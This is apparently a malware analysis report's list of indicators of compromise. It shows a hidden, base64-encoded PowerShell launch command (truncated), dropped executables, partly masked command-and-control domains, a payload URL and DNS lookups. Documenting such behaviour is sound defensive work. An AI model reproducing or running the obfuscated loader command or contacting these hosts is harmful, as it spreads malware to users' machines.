Technical Information
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -w hidden -enco JABMAGEAYgBiAHkAdABuAHgAZQBwAHcAYQB0AD0AJwBCAHgAYwBnAHIAbQBwAHkAbwAnADsAJABOAHQAbABxAHUAcQBjAGIAdwAgAD0AIAAnADUAMwA2ACcAOwAkAE4AawBwAHMAZgB5AHAAagA9ACcAWgBtAHU...
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1480
- %TEMP%\1439358.cvr
- %HOMEPATH%\536.exe
- 'ag####.airosgroup.com':443
- 'gw###pmw.net':80
- http://gw###pmw.net/wp-admin/aujxsb24/
- 'ag####.airosgroup.com':443
- DNS ASK ke##bes.com
- DNS ASK me###dry.com
- DNS ASK oa######econtractors.com
- DNS ASK ag####.airosgroup.com
- DNS ASK gw###pmw.net